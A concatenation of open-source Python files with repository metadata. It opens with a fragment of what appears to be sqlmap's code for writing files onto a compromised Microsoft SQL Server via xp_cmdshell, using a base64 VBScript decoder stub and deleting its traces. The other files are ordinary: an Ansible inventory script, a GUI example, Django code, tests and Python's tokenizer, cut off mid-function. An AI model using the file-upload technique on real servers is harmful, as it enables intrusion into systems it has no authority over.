randVbs = "tmps%s.vbs" % randomStr(lowercase=True)
randFile = "tmpf%s.txt" % randomStr(lowercase=True)
randFilePath = "%s\%s" % (tmpPath, randFile)
vbs = """Dim inputFilePath, outputFilePath
inputFilePath = "%s"
outputFilePath = "%s"
Set fs = CreateObject("Scripting.FileSystemObject")
Set file = fs.GetFile(inputFilePath)
If file.Size Then
Wscript.Echo "Loading from: " & inputFilePath
Wscript.Echo
Set fd = fs.OpenTextFile(inputFilePath, 1)
data = fd.ReadAll
fd.Close
data = Replace(data, " ", "")
data = Replace(data, vbCr, "")
data = Replace(data, vbLf, "")
Wscript.Echo "Fixed Input: "
Wscript.Echo data
Wscript.Echo
decodedData = base64_decode(data)
Wscript.Echo "Output: "
Wscript.Echo decodedData
Wscript.Echo
Wscript.Echo "Writing output in: " & outputFilePath
Wscript.Echo
Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile(outputFilePath, 2, True)
ofs.Write decodedData
ofs.close
Else
Wscript.Echo "The file is empty."
End If
Function base64_decode(byVal strIn)
Dim w1, w2, w3, w4, n, strOut
For n = 1 To Len(strIn) Step 4
w1 = mimedecode(Mid(strIn, n, 1))
w2 = mimedecode(Mid(strIn, n + 1, 1))
w3 = mimedecode(Mid(strIn, n + 2, 1))
w4 = mimedecode(Mid(strIn, n + 3, 1))
If Not w2 Then _
strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255))
If Not w3 Then _
strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255))
If Not w4 Then _
strOut = strOut + Chr(((w3 * 64 + w4) And 255))
Next
base64_decode = strOut
End Function
Function mimedecode(byVal strIn)
Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
If Len(strIn) = 0 Then
mimedecode = -1 : Exit Function
Else
mimedecode = InStr(Base64Chars, strIn) - 1
End If
End Function""" % (randFilePath, dFile)
vbs = vbs.replace(" ", "")
encodedFileContent = wFileContent.encode("base64")[:-1]
logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile)
logger.debug("uploading a visual basic decoder stub %s\%s, please wait.." % (tmpPath, randVbs))
self.xpCmdshellWriteFile(vbs, tmpPath, randVbs)
commands = ("cd %s" % tmpPath, "cscript //nologo %s" % randVbs,
"del /F /Q %s" % randVbs,
"del /F /Q %s" % randFile)
complComm = " & ".join(command for command in commands)
self.execCmd(complComm)
def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
# NOTE: this is needed here because we use xp_cmdshell extended
# procedure to write a file on the back-end Microsoft SQL Server
# file system
self.initEnv()
self.getRemoteTempPath()
tmpPath = posixToNtSlashes(conf.tmpPath)
dFile = posixToNtSlashes(dFile)
with open(wFile, "rb") as f:
wFileContent = f.read()
self._stackedWriteFileVbs(tmpPath, wFileContent, dFile, fileType)
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
if written is False:
message = "do you want to try to upload the file with "
message += "another technique? [Y/n] "
choice = readInput(message, default="Y")
if not choice or choice.lower() == "y":
self._stackedWriteFileDebugExe(tmpPath, wFile, wFileContent, dFile, fileType)
#self._stackedWriteFilePS(tmpPath, wFileContent, dFile, fileType)
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
return written
| gpl-2.0 | -8,906,479,215,008,853,000 | 39.23662 | 287 | 0.591291 | false |
nuagenetworks/vspk-python | vspk/v6/fetchers/nuipfilterprofiles_fetcher.py | 2 | 2156 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2015, Alcatel-Lucent Inc, 2017 Nokia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from bambou import NURESTFetcher
class NUIPFilterProfilesFetcher(NURESTFetcher):
""" Represents a NUIPFilterProfiles fetcher
Notes:
This fetcher enables to fetch NUIPFilterProfile objects.
See:
bambou.NURESTFetcher
"""
@classmethod
def managed_class(cls):
""" Return NUIPFilterProfile class that is managed.
Returns:
.NUIPFilterProfile: the managed class
"""
from .. import NUIPFilterProfile
return NUIPFilterProfile
| bsd-3-clause | 3,555,821,321,365,558,300 | 39.698113 | 86 | 0.730983 | false |
bols-blue/ansible | plugins/inventory/jail.py | 132 | 1288 | #!/usr/bin/env python
# (c) 2013, Michael Scherer <[email protected]>
#
# This file is part of Ansible,
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from subprocess import Popen,PIPE
import sys
import json
result = {}
result['all'] = {}
pipe = Popen(['jls', '-q', 'name'], stdout=PIPE, universal_newlines=True)
result['all']['hosts'] = [x[:-1] for x in pipe.stdout.readlines()]
result['all']['vars'] = {}
result['all']['vars']['ansible_connection'] = 'jail'
if len(sys.argv) == 2 and sys.argv[1] == '--list':
print json.dumps(result)
elif len(sys.argv) == 3 and sys.argv[1] == '--host':
print json.dumps({'ansible_connection': 'jail'})
else:
print "Need an argument, either --list or --host <host>"
| gpl-3.0 | 1,940,142,698,944,674,800 | 33.810811 | 73 | 0.696429 | false |
maikodaraine/EnlightenmentUbuntu | bindings/python/python-efl/examples/elementary/test_segment_control.py | 1 | 2798 | #!/usr/bin/env python
# encoding: utf-8
import os
from efl.evas import EVAS_HINT_EXPAND, EVAS_HINT_FILL
from efl import elementary
from efl.elementary.window import StandardWindow
from efl.elementary.box import Box
from efl.elementary.icon import Icon
from efl.elementary.segment_control import SegmentControl
EXPAND_BOTH = EVAS_HINT_EXPAND, EVAS_HINT_EXPAND
EXPAND_HORIZ = EVAS_HINT_EXPAND, 0.0
FILL_BOTH = EVAS_HINT_FILL, EVAS_HINT_FILL
FILL_HORIZ = EVAS_HINT_FILL, 0.5
script_path = os.path.dirname(os.path.abspath(__file__))
img_path = os.path.join(script_path, "images")
def cb_seg_changed(seg, item):
print(seg)
print(item)
def segment_control_clicked(obj):
win = StandardWindow("segment-control", "Segment Control test",
autodel=True, size=(320, 280))
if obj is None:
win.callback_delete_request_add(lambda o: elementary.exit())
vbox = Box(win, size_hint_weight=EXPAND_BOTH, size_hint_align=FILL_BOTH)
win.resize_object_add(vbox)
vbox.show()
# segment 1
seg = SegmentControl(win, size_hint_weight=EXPAND_BOTH,
size_hint_align=FILL_HORIZ)
seg.item_add(None, "Only Text")
ic = Icon(win, file=os.path.join(img_path, "logo_small.png"))
it = seg.item_add(ic)
ic = Icon(win)
ic = Icon(win, file=os.path.join(img_path, "logo_small.png"))
seg.item_add(ic, "Text + Icon")
seg.item_add(None, "Seg4")
seg.item_add(None, "Seg5")
seg.callback_changed_add(cb_seg_changed)
it.selected = True
vbox.pack_end(seg)
seg.show()
# segment 2
seg = SegmentControl(win, size_hint_weight=EXPAND_BOTH,
size_hint_align=FILL_HORIZ)
seg.item_add(None, "SegmentItem")
it = seg.item_add(None, "SegmentItem")
seg.item_add(None, "SegmentItem")
seg.item_add(None, "SegmentItem")
it.selected = True
vbox.pack_end(seg)
seg.show()
# segment 3
seg = SegmentControl(win, size_hint_weight=EXPAND_BOTH,
size_hint_align=(0.5, 0.5))
for i in range(3):
ic = Icon(win, file=os.path.join(img_path, "logo_small.png"))
if i == 1:
it = seg.item_add(ic)
else:
seg.item_add(ic)
it.selected = True
vbox.pack_end(seg)
seg.show()
# segment 4
seg = SegmentControl(win, size_hint_weight=EXPAND_BOTH,
size_hint_align=FILL_HORIZ, disabled=True)
seg.item_add(None, "Disabled")
ic = Icon(win, file=os.path.join(img_path, "logo_small.png"))
it = seg.item_add(ic, "Disabled")
ic = Icon(win, file=os.path.join(img_path, "logo_small.png"))
seg.item_add(ic)
it.selected = True
vbox.pack_end(seg)
seg.show()
win.show()
if __name__ == "__main__":
elementary.init()
segment_control_clicked(None)
elementary.run()
elementary.shutdown()
| unlicense | -3,053,627,461,250,338,000 | 25.647619 | 76 | 0.645461 | false |
AlexanderKaluzhny/instanotifier | instanotifier/notification/serializers.py | 1 | 1953 | from copy import deepcopy
import hashlib
from bs4 import BeautifulSoup
from rest_framework import serializers
from instanotifier.notification.models import RssNotification
from instanotifier.notification.utils import html
def _parse_country(summary):
soup = BeautifulSoup(summary, features="html5lib")
country_tag = soup.find(text="Country")
if country_tag:
country = country_tag.find_next(string=True).strip(': \n')
return country
return "Unknown"
def _compute_entry_id_hash(entry_id):
return hashlib.md5(entry_id.encode("utf-8")).hexdigest()
class RssNotificationCreateSerializer(serializers.ModelSerializer):
"""
Creates the RssNotification from the data provided by Feed parser.
Evaluates the necessary fields deriving it from the data.
"""
class Meta:
model = RssNotification
fields = ["entry_id", "title", "summary", "link", "published_parsed", "country", "internal_id"]
def to_internal_value(self, data):
new_data = deepcopy(data)
new_data['entry_id'] = data['id']
new_data['country'] = 'TBD' # it is a derived field, we will set it based on "summary" field
new_data['internal_id'] = 'TBD' # it is a derived field, we will set it based on "entry_id" field
new_data = super().to_internal_value(new_data)
return new_data
def validate_summary(self, value):
summary = html.clean_html(value)
return summary
def validate(self, validated_data):
summary = validated_data["summary"]
validated_data["country"] = _parse_country(summary)
validated_data["internal_id"] = _compute_entry_id_hash(validated_data["entry_id"])
return validated_data
class RssNotificationUpdateSerializer(serializers.ModelSerializer):
class Meta:
model = RssNotification
fields = ["entry_id", "title", "summary", "link", "published_parsed", "country", "internal_id"]
| mit | 517,890,186,136,581,800 | 34.509091 | 106 | 0.678443 | false |
stgraber/snapcraft | integration_tests/test_make_plugin.py | 6 | 2306 | # -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2015, 2016 Canonical Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
from testtools.matchers import (
DirExists,
Not
)
import integration_tests
class MakePluginTestCase(integration_tests.TestCase):
def test_stage_make_plugin(self):
project_dir = 'simple-make'
self.run_snapcraft('stage', project_dir)
binary_output = self.get_output_ignoring_non_zero_exit(
os.path.join('stage', 'bin', 'test'),
cwd=project_dir)
self.assertEqual('Hello world\n', binary_output)
def test_clean_make_plugin(self):
project_dir = 'simple-make'
self.run_snapcraft('snap', project_dir)
snap_dirs = ('stage', 'parts', 'prime')
for dir_ in snap_dirs:
self.assertThat(
os.path.join(project_dir, dir_), DirExists())
self.run_snapcraft('clean', project_dir)
for dir_ in snap_dirs:
self.assertThat(
os.path.join(project_dir, dir_), Not(DirExists()))
def test_nonstandard_makefile(self):
project_dir = 'simple-make-nonstandard-makefile'
self.run_snapcraft('stage', project_dir)
binary_output = self.get_output_ignoring_non_zero_exit(
os.path.join('stage', 'bin', 'test'),
cwd=project_dir)
self.assertEqual('Hello world\n', binary_output)
def test_stage_make_with_artifacts(self):
project_dir = 'simple-make-artifacts'
self.run_snapcraft('stage', project_dir)
binary_output = self.get_output_ignoring_non_zero_exit(
os.path.join('stage', 'test'),
cwd=project_dir)
self.assertEqual('Hello World!\n', binary_output)
| gpl-3.0 | -4,563,130,811,681,119,000 | 32.911765 | 71 | 0.648742 | false |
gustavomazevedo/tbackup-client | client/migrations/0009_auto__add_field_backup_origin__chg_field_backup_remote_id.py | 1 | 4529 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Backup.origin'
db.add_column(u'client_backup', 'origin',
self.gf('django.db.models.fields.CharField')(max_length=256, null=True, blank=True),
keep_default=False)
# Changing field 'Backup.remote_id'
db.alter_column(u'client_backup', 'remote_id', self.gf('django.db.models.fields.BigIntegerField')(null=True))
def backwards(self, orm):
# Deleting field 'Backup.origin'
db.delete_column(u'client_backup', 'origin')
# Changing field 'Backup.remote_id'
db.alter_column(u'client_backup', 'remote_id', self.gf('django.db.models.fields.BigIntegerField')(default=0))
models = {
'client.backup': {
'Meta': {'object_name': 'Backup'},
'destination': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'file': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_error': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'origin': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'remote_backup_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'remote_id': ('django.db.models.fields.BigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'schedule': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['client.Schedule']"})
},
'client.oplog': {
'Meta': {'object_name': 'OpLog'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'client.origin': {
'Meta': {'object_name': 'Origin'},
'auth_token': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'remote_id': ('django.db.models.fields.BigIntegerField', [], {})
},
'client.rrule': {
'Meta': {'object_name': 'RRule'},
'description': ('django.db.models.fields.TextField', [], {}),
'frequency': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'params': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
'client.schedule': {
'Meta': {'object_name': 'Schedule'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'destination': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'initial_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2014, 11, 27, 0, 0)'}),
'rule': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['client.RRule']", 'null': 'True', 'blank': 'True'})
},
'client.webserver': {
'Meta': {'object_name': 'WebServer'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'api_root': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '1024'})
}
}
complete_apps = ['client'] | mit | -9,024,610,039,972,506,000 | 55.625 | 134 | 0.547141 | false |
makacodewalker/etsgh | django/utils/datetime_safe.py | 496 | 2685 | # Python's datetime strftime doesn't handle dates before 1900.
# These classes override date and datetime to support the formatting of a date
# through its full "proleptic Gregorian" date range.
#
# Based on code submitted to comp.lang.python by Andrew Dalke
#
# >>> datetime_safe.date(1850, 8, 2).strftime("%Y/%m/%d was a %A")
# '1850/08/02 was a Friday'
from datetime import date as real_date, datetime as real_datetime
import re
import time
class date(real_date):
def strftime(self, fmt):
return strftime(self, fmt)
class datetime(real_datetime):
def strftime(self, fmt):
return strftime(self, fmt)
def combine(self, date, time):
return datetime(date.year, date.month, date.day, time.hour, time.minute, time.microsecond, time.tzinfo)
def date(self):
return date(self.year, self.month, self.day)
def new_date(d):
"Generate a safe date from a datetime.date object."
return date(d.year, d.month, d.day)
def new_datetime(d):
"""
Generate a safe datetime from a datetime.date or datetime.datetime object.
"""
kw = [d.year, d.month, d.day]
if isinstance(d, real_datetime):
kw.extend([d.hour, d.minute, d.second, d.microsecond, d.tzinfo])
return datetime(*kw)
# This library does not support strftime's "%s" or "%y" format strings.
# Allowed if there's an even number of "%"s because they are escaped.
_illegal_formatting = re.compile(r"((^|[^%])(%%)*%[sy])")
def _findall(text, substr):
# Also finds overlaps
sites = []
i = 0
while 1:
j = text.find(substr, i)
if j == -1:
break
sites.append(j)
i=j+1
return sites
def strftime(dt, fmt):
if dt.year >= 1900:
return super(type(dt), dt).strftime(fmt)
illegal_formatting = _illegal_formatting.search(fmt)
if illegal_formatting:
raise TypeError("strftime of dates before 1900 does not handle" + illegal_formatting.group(0))
year = dt.year
# For every non-leap year century, advance by
# 6 years to get into the 28-year repeat cycle
delta = 2000 - year
off = 6 * (delta // 100 + delta // 400)
year = year + off
# Move to around the year 2000
year = year + ((2000 - year) // 28) * 28
timetuple = dt.timetuple()
s1 = time.strftime(fmt, (year,) + timetuple[1:])
sites1 = _findall(s1, str(year))
s2 = time.strftime(fmt, (year+28,) + timetuple[1:])
sites2 = _findall(s2, str(year+28))
sites = []
for site in sites1:
if site in sites2:
sites.append(site)
s = s1
syear = "%04d" % (dt.year,)
for site in sites:
s = s[:site] + syear + s[site+4:]
return s
| bsd-3-clause | -2,379,734,288,544,815,600 | 29.168539 | 111 | 0.627561 | false |
j00bar/django-widgy | widgy/contrib/form_builder/views.py | 1 | 1271 | from django.views.generic.edit import FormMixin
from django.shortcuts import get_object_or_404
from widgy.models import Node
class HandleFormMixin(FormMixin):
"""
An abstract view mixin for handling form_builder.Form submissions.
"""
def post(self, *args, **kwargs):
"""
copied from django.views.generic.edit.ProcessFormView, because we want
the post method, but not the get method.
"""
form_class = self.get_form_class()
form = self.get_form(form_class)
if form.is_valid():
return self.form_valid(form)
else:
return self.form_invalid(form)
put = post
def get_form_node(self):
node = get_object_or_404(Node, pk=self.kwargs['form_node_pk'])
node.prefetch_tree()
return node
def get_form_class(self):
self.form_node = self.get_form_node()
return self.form_node.content.build_form_class()
def get_context_data(self, **kwargs):
if 'form' in kwargs:
kwargs.setdefault(self.form_node.content.context_var, kwargs['form'])
return super(HandleFormMixin, self).get_context_data(**kwargs)
def form_valid(self, form):
return self.form_node.content.execute(self.request, form)
| apache-2.0 | -5,065,467,504,449,733,000 | 31.589744 | 81 | 0.636507 | false |
fighterCui/L4ReFiascoOC | l4/pkg/python/contrib/Lib/tokenize.py | 62 | 16326 | """Tokenization help for Python programs.
generate_tokens(readline) is a generator that breaks a stream of
text into Python tokens. It accepts a readline-like method which is called
repeatedly to get the next line of input (or "" for EOF). It generates
5-tuples with these members:
the token type (see token.py)
the token (a string)
the starting (row, column) indices of the token (a 2-tuple of ints)
the ending (row, column) indices of the token (a 2-tuple of ints)
the original line (string)
It is designed to match the working of the Python tokenizer exactly, except
that it produces COMMENT tokens for comments and gives type OP for all
operators
Older entry points
tokenize_loop(readline, tokeneater)
tokenize(readline, tokeneater=printtoken)
are the same, except instead of generating tokens, tokeneater is a callback
function to which the 5 fields described above are passed as 5 arguments,
each time a new token is found."""
__author__ = 'Ka-Ping Yee <[email protected]>'
__credits__ = \
'GvR, ESR, Tim Peters, Thomas Wouters, Fred Drake, Skip Montanaro, Raymond Hettinger'
import string, re
from token import *
import token
__all__ = [x for x in dir(token) if x[0] != '_'] + ["COMMENT", "tokenize",
"generate_tokens", "NL", "untokenize"]
del x
del token
COMMENT = N_TOKENS
tok_name[COMMENT] = 'COMMENT'
NL = N_TOKENS + 1
tok_name[NL] = 'NL'
N_TOKENS += 2
def group(*choices): return '(' + '|'.join(choices) + ')'
def any(*choices): return group(*choices) + '*'
def maybe(*choices): return group(*choices) + '?'
Whitespace = r'[ \f\t]*'
Comment = r'#[^\r\n]*'
Ignore = Whitespace + any(r'\\\r?\n' + Whitespace) + maybe(Comment)
Name = r'[a-zA-Z_]\w*'
Hexnumber = r'0[xX][\da-fA-F]+[lL]?'
Octnumber = r'(0[oO][0-7]+)|(0[0-7]*)[lL]?'
Binnumber = r'0[bB][01]+[lL]?'
Decnumber = r'[1-9]\d*[lL]?'
Intnumber = group(Hexnumber, Binnumber, Octnumber, Decnumber)
Exponent = r'[eE][-+]?\d+'
Pointfloat = group(r'\d+\.\d*', r'\.\d+') + maybe(Exponent)
Expfloat = r'\d+' + Exponent
Floatnumber = group(Pointfloat, Expfloat)
Imagnumber = group(r'\d+[jJ]', Floatnumber + r'[jJ]')
Number = group(Imagnumber, Floatnumber, Intnumber)
# Tail end of ' string.
Single = r"[^'\\]*(?:\\.[^'\\]*)*'"
# Tail end of " string.
Double = r'[^"\\]*(?:\\.[^"\\]*)*"'
# Tail end of ''' string.
Single3 = r"[^'\\]*(?:(?:\\.|'(?!''))[^'\\]*)*'''"
# Tail end of """ string.
Double3 = r'[^"\\]*(?:(?:\\.|"(?!""))[^"\\]*)*"""'
Triple = group("[uU]?[rR]?'''", '[uU]?[rR]?"""')
# Single-line ' or " string.
String = group(r"[uU]?[rR]?'[^\n'\\]*(?:\\.[^\n'\\]*)*'",
r'[uU]?[rR]?"[^\n"\\]*(?:\\.[^\n"\\]*)*"')
# Because of leftmost-then-longest match semantics, be sure to put the
# longest operators first (e.g., if = came before ==, == would get
# recognized as two instances of =).
Operator = group(r"\*\*=?", r">>=?", r"<<=?", r"<>", r"!=",
r"//=?",
r"[+\-*/%&|^=<>]=?",
r"~")
Bracket = '[][(){}]'
Special = group(r'\r?\n', r'[:;.,`@]')
Funny = group(Operator, Bracket, Special)
PlainToken = group(Number, Funny, String, Name)
Token = Ignore + PlainToken
# First (or only) line of ' or " string.
ContStr = group(r"[uU]?[rR]?'[^\n'\\]*(?:\\.[^\n'\\]*)*" +
group("'", r'\\\r?\n'),
r'[uU]?[rR]?"[^\n"\\]*(?:\\.[^\n"\\]*)*' +
group('"', r'\\\r?\n'))
PseudoExtras = group(r'\\\r?\n', Comment, Triple)
PseudoToken = Whitespace + group(PseudoExtras, Number, Funny, ContStr, Name)
tokenprog, pseudoprog, single3prog, double3prog = map(
re.compile, (Token, PseudoToken, Single3, Double3))
endprogs = {"'": re.compile(Single), '"': re.compile(Double),
"'''": single3prog, '"""': double3prog,
"r'''": single3prog, 'r"""': double3prog,
"u'''": single3prog, 'u"""': double3prog,
"ur'''": single3prog, 'ur"""': double3prog,
"R'''": single3prog, 'R"""': double3prog,
"U'''": single3prog, 'U"""': double3prog,
"uR'''": single3prog, 'uR"""': double3prog,
"Ur'''": single3prog, 'Ur"""': double3prog,
"UR'''": single3prog, 'UR"""': double3prog,
"b'''": single3prog, 'b"""': double3prog,
"br'''": single3prog, 'br"""': double3prog,
"B'''": single3prog, 'B"""': double3prog,
"bR'''": single3prog, 'bR"""': double3prog,
"Br'''": single3prog, 'Br"""': double3prog,
"BR'''": single3prog, 'BR"""': double3prog,
'r': None, 'R': None, 'u': None, 'U': None,
'b': None, 'B': None}
triple_quoted = {}
for t in ("'''", '"""',
"r'''", 'r"""', "R'''", 'R"""',
"u'''", 'u"""', "U'''", 'U"""',
"ur'''", 'ur"""', "Ur'''", 'Ur"""',
"uR'''", 'uR"""', "UR'''", 'UR"""',
"b'''", 'b"""', "B'''", 'B"""',
"br'''", 'br"""', "Br'''", 'Br"""',
"bR'''", 'bR"""', "BR'''", 'BR"""'):
triple_quoted[t] = t
single_quoted = {}
for t in ("'", '"',
"r'", 'r"', "R'", 'R"',
"u'", 'u"', "U'", 'U"',
"ur'", 'ur"', "Ur'", 'Ur"',
"uR'", 'uR"', "UR'", 'UR"',
"b'", 'b"', "B'", 'B"',
"br'", 'br"', "Br'", 'Br"',
"bR'", 'bR"', "BR'", 'BR"' ):
single_quoted[t] = t
tabsize = 8
class TokenError(Exception): pass
class StopTokenizing(Exception): pass
def printtoken(type, token, srow_scol, erow_ecol, line): # for testing
srow, scol = srow_scol
erow, ecol = erow_ecol
print "%d,%d-%d,%d:\t%s\t%s" % \
(srow, scol, erow, ecol, tok_name[type], repr(token))
def tokenize(readline, tokeneater=printtoken):
"""
The tokenize() function accepts two parameters: one representing the
input stream, and one providing an output mechanism for tokenize().
The first parameter, readline, must be a callable object which provides
the same interface as the readline() method of built-in file objects.
Each call to the function should return one line of input as a string.
The second parameter, tokeneater, must also be a callable object. It is
called once for each token, with five arguments, corresponding to the
tuples generated by generate_tokens().
"""
try:
tokenize_loop(readline, tokeneater)
except StopTokenizing:
pass
# backwards compatible interface
def tokenize_loop(readline, tokeneater):
for token_info in generate_tokens(readline):
tokeneater(*token_info)
class Untokenizer:
def __init__(self):
self.tokens = []
self.prev_row = 1
self.prev_col = 0
def add_whitespace(self, start):
row, col = start
assert row <= self.prev_row
col_offset = col - self.prev_col
if col_offset:
self.tokens.append(" " * col_offset)
def untokenize(self, iterable):
for t in iterable:
if len(t) == 2:
self.compat(t, iterable)
break
tok_type, token, start, end, line = t
self.add_whitespace(start)
self.tokens.append(token)
self.prev_row, self.prev_col = end
if tok_type in (NEWLINE, NL):
self.prev_row += 1
self.prev_col = 0
return "".join(self.tokens)
def compat(self, token, iterable):
startline = False
indents = []
toks_append = self.tokens.append
toknum, tokval = token
if toknum in (NAME, NUMBER):
tokval += ' '
if toknum in (NEWLINE, NL):
startline = True
prevstring = False
for tok in iterable:
toknum, tokval = tok[:2]
if toknum in (NAME, NUMBER):
tokval += ' '
# Insert a space between two consecutive strings
if toknum == STRING:
if prevstring:
tokval = ' ' + tokval
prevstring = True
else:
prevstring = False
if toknum == INDENT:
indents.append(tokval)
continue
elif toknum == DEDENT:
indents.pop()
continue
elif toknum in (NEWLINE, NL):
startline = True
elif startline and indents:
toks_append(indents[-1])
startline = False
toks_append(tokval)
def untokenize(iterable):
"""Transform tokens back into Python source code.
Each element returned by the iterable must be a token sequence
with at least two elements, a token number and token value. If
only two tokens are passed, the resulting output is poor.
Round-trip invariant for full input:
Untokenized source will match input source exactly
Round-trip invariant for limited intput:
# Output text will tokenize the back to the input
t1 = [tok[:2] for tok in generate_tokens(f.readline)]
newcode = untokenize(t1)
readline = iter(newcode.splitlines(1)).next
t2 = [tok[:2] for tok in generate_tokens(readline)]
assert t1 == t2
"""
ut = Untokenizer()
return ut.untokenize(iterable)
def generate_tokens(readline):
"""
The generate_tokens() generator requires one argment, readline, which
must be a callable object which provides the same interface as the
readline() method of built-in file objects. Each call to the function
should return one line of input as a string. Alternately, readline
can be a callable function terminating with StopIteration:
readline = open(myfile).next # Example of alternate readline
The generator produces 5-tuples with these members: the token type; the
token string; a 2-tuple (srow, scol) of ints specifying the row and
column where the token begins in the source; a 2-tuple (erow, ecol) of
ints specifying the row and column where the token ends in the source;
and the line on which the token was found. The line passed is the
logical line; continuation lines are included.
"""
lnum = parenlev = continued = 0
namechars, numchars = string.ascii_letters + '_', '0123456789'
contstr, needcont = '', 0
contline = None
indents = [0]
while 1: # loop over lines in stream
try:
line = readline()
except StopIteration:
line = ''
lnum = lnum + 1
pos, max = 0, len(line)
if contstr: # continued string
if not line:
raise TokenError, ("EOF in multi-line string", strstart)
endmatch = endprog.match(line)
if endmatch:
pos = end = endmatch.end(0)
yield (STRING, contstr + line[:end],
strstart, (lnum, end), contline + line)
contstr, needcont = '', 0
contline = None
elif needcont and line[-2:] != '\\\n' and line[-3:] != '\\\r\n':
yield (ERRORTOKEN, contstr + line,
strstart, (lnum, len(line)), contline)
contstr = ''
contline = None
continue
else:
contstr = contstr + line
contline = contline + line
continue
elif parenlev == 0 and not continued: # new statement
if not line: break
column = 0
while pos < max: # measure leading whitespace
if line[pos] == ' ': column = column + 1
elif line[pos] == '\t': column = (column/tabsize + 1)*tabsize
elif line[pos] == '\f': column = 0
else: break
pos = pos + 1
if pos == max: break
if line[pos] in '#\r\n': # skip comments or blank lines
if line[pos] == '#':
comment_token = line[pos:].rstrip('\r\n')
nl_pos = pos + len(comment_token)
yield (COMMENT, comment_token,
(lnum, pos), (lnum, pos + len(comment_token)), line)
yield (NL, line[nl_pos:],
(lnum, nl_pos), (lnum, len(line)), line)
else:
yield ((NL, COMMENT)[line[pos] == '#'], line[pos:],
(lnum, pos), (lnum, len(line)), line)
